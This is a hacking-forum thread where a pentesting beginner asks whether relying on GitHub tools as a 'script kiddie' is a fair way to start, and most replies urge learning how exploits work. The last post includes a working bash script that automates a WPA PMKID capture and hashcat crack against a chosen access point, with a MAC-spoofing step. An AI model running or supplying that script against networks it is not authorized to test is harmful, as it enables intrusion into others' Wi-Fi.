Jump to content

Is it right to start as a script kitty?


aciighost
 Share

Recommended Posts

So about 10 months ago i started learning pen testing and not like being a hacker or anon or mr robot type but like a decent security analyst since i am a 2nd year software engineer with some weakness in the field of programming which i am  trying to improve;

main story is that i took an online course to learn ethical hacking but the course was designed in 2015 and i took it in 2017 and  80% of those hacks are obsolete(even day by day) but respecting the fact that i am able to now work 90% of my work around those  pen testing tools on my own but i feel really upset for the fact that i am making those exploits from the old 2015 course work 5x faster and more efficient using the help of github i know its not right but i am still really far behind so i want to know from you the top security analysts that is at times using github to work efficiently with your pen testing a helpful way to start? sure as time will pass i am starting to develop my own exploits like a keylogger which i have recently developed on my own.

is it a good way to start from github and then develop using my own ignoring what i have learned which is now useless since everything gets patched daily

Link to comment
Share on other sites

If your serious about pentesting, run metasploit pro and burpsuit proxy as regular tools.

Use exploit database  or GHDB for current vulnerability assesments.

Older courses teach method, to stay ahead of exploits, search the above or better still......find your own with your new found knowledge!

  • Upvote 1
Link to comment
Share on other sites

Everyone's got to start somewhere. No one goes from zero to hero in an instant.

In the same way that any online game player will start as a 'n00b' and become pro with time, so then most hackers begin as Skiddies and become pro.

Just keep it to that though; no acting like a Skiddy (trolling, asking stupid questions, not taking the time to learn things properly).

Link to comment
Share on other sites

10 hours ago, Dave-ee Jones said:

That said, I know a lot of people - including me - don't appreciate script kiddies. At all. 99% of the time they're just trying to be annoying with cute little scripts thinking it's funny.

We have short memories and sometimes forget how we started out!

Experimenting is the best curve ball for learning, even though they can be annoying!

Link to comment
Share on other sites

I waited to reply to this.  I am an old fud.  There is nothing wrong with using the tools other before you have provided.  The thing that makes me really call someone a script kiddy is when their learning and understanding stops there.  So, you have this tool and its source..or an exploit and its source but you never bothered to look into how it works or what makes it tick.  You never reverse engineered it to see what is going on hence you really do not know what it is doing.  That is like giving a 5 year old a nuke.  They know it goes boom but they do not know anything about fallout and radiation.

So, being a temporary kiddy on your way to understanding is cool.  Being a kiddy because you are mentally lazy is not hacking.  Doesn't even define the word because you are only an expert at running someone else's tool.  In my opinion you become one of the masses on github asking a creator they should figure out and add a certain exploit instead of themselves knowing anything about how the exploit works, much less adding it themselves.  That is a script kiddy through and through.

So, if you use metasploit to pop a test box, look at how that exploit works.  Try and rewrite it in another language like python or whatever.  Metasploit even comes with tools built into itself to inspect its payloads source.  Want to learn how to exploit with Powershell, look at Empire and its modules.  Use the tool and then look under the hood to see how it is pulled off so you know and can do this in any situation with almost any custom code.  In the process you may come up with cool ideas yourself.  Those two tools have taught me so much about how a C&C server would work.  

A magician pulling a magic trick when the magician who is doing it has no idea how they did it is sad.  Funny when someone in the audience does know and can do it even better because they do.

  • Like 1
  • Upvote 1
Link to comment
Share on other sites

I did some skiddy stuff this weekend. Got some real quick results. If I get some free time ill post a video tutorial and the ruby code.

 

Ill show the steps I took. Starting with a empty text file ill write a small amount of code to produce a skiddy but powerful web exploit tool using applications already available.

 

ill show a technique I learned by following a hacker by the name of mulciber. Ten years ago I watched him root hackforums dot net.

Link to comment
Share on other sites

1 hour ago, PoSHMagiC0de said:

That is like giving a 5 year old a nuke.  They know it goes boom but they do not know anything about fallout and radiation.

I like that likeness.

13 hours ago, r3plic4tor said:

We have short memories and sometimes forget how we started out!

Experimenting is the best curve ball for learning, even though they can be annoying!

I know I didn't start out throwing annoying scripts around school just to troll the IT guys and my friends, let alone throwing them around the internet on websites and stuff. They're playing with fire, and we all know what happens when you do that..

1 hour ago, PoSHMagiC0de said:

So, if you use metasploit to pop a test box, look at how that exploit works.  Try and rewrite it in another language like python or whatever.  Metasploit even comes with tools built into itself to inspect its payloads source.  Want to learn how to exploit with Powershell, look at Empire and its modules.  Use the tool and then look under the hood to see how it is pulled off so you know and can do this in any situation with almost any custom code.  In the process you may come up with cool ideas yourself.  Those two tools have taught me so much about how a C&C server would work. 

I would look at the code of scripts and things but 75% of the time I would have no idea what I'm reading unless I was 100% familiar with the script language. Especially ones written in OOP. That's confusing even if you wrote the code ? 

Link to comment
Share on other sites

On 6/14/2018 at 8:50 AM, aciighost said:

So about 10 months ago i started learning pen testing and not like being a hacker or anon or mr robot type but like a decent security analyst since i am a 2nd year software engineer with some weakness in the field of programming which i am  trying to improve;

main story is that i took an online course to learn ethical hacking but the course was designed in 2015 and i took it in 2017 and  80% of those hacks are obsolete(even day by day) but respecting the fact that i am able to now work 90% of my work around those  pen testing tools on my own but i feel really upset for the fact that i am making those exploits from the old 2015 course work 5x faster and more efficient using the help of github i know its not right but i am still really far behind so i want to know from you the top security analysts that is at times using github to work efficiently with your pen testing a helpful way to start? sure as time will pass i am starting to develop my own exploits like a keylogger which i have recently developed on my own.

is it a good way to start from github and then develop using my own ignoring what i have learned which is now useless since everything gets patched daily

 

I made a script kiddy video. Its a technique that is my goto first method. I find good success when this method is suited.

 

Ill make a new thread with simplified example code.

  • Like 1
Link to comment
Share on other sites

  • 2 months later...

Using script kiddie tools will teach you, troubleshooting, networking, operating systems, problem solving.
Learning how to use man pages, --help, look up error messages, resolve dependency issues, properly word a forum question so as one does not get flamed, copy and paste from stack overflow. Learning concepts like io redirection, then thinking how do I code this to make it work faster and type fewer commands?

Instead of using ip link or ifconfig and scrolling through output why not use some pipes and and maybe do some scripting.

ifconfig | grep 'wl' | cut -d ' ' -f 1 | sed s/://g
ip link | grep 'wl' | cut -d " " -f2 | sed s/://g

Maybe start coding a tool for automating what's already there. It's a lot of command line statements to get the the MAC address of the access you point you want to attack PMKID on. Why type when you don't have to?

Why not just make this all one function?
 

systemctl stop NetworkManager
systemctl stop wpa_supplicant
systemctl stop dhclient
airmon-ng check kill
wifi=$(ifconfig | grep 'wl' | cut -d ' ' -f 1 | sed s/://g)
mon=$(ifconfig | grep 'wl' | cut -d ' ' -f 1 | sed s/://g | grep 'mon')
ifconfig $wifi down
macchanger -r $wifi
ifconfig $wifi up
airmon-ng start $wifi
timeout 10 airodump-ng wlan0mon -w wifis --write-interval 5 -o csv
cat testtemp.csv | grep  '$ACCESSPOINT' | cut -d " " -f 1 | sed s/,//g | sed s/://g > mac.txt

hcxdumptool -o hash -i wlan0mon --filterlist=mac.txt --filtermode=2 --enable_status=3
hashcat -m 16800 /root/hashtocrack -a 3 -w 3 '?u?d?u?d?d65D' --force
hashcat -m 16800 /root/hashtocrack -a 3 -w 3 '?u?d?u?d?d65D' --force --show

I think I just damn near scripted a complete automation of the PMKID attack while I was trying to explain what using automated tools will do for you. Sorry for crappy BASH example. My point on tools is don't reinvent the wheel. Make a better wheel and stipe the tires and such.


 

Edited by vailixi
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...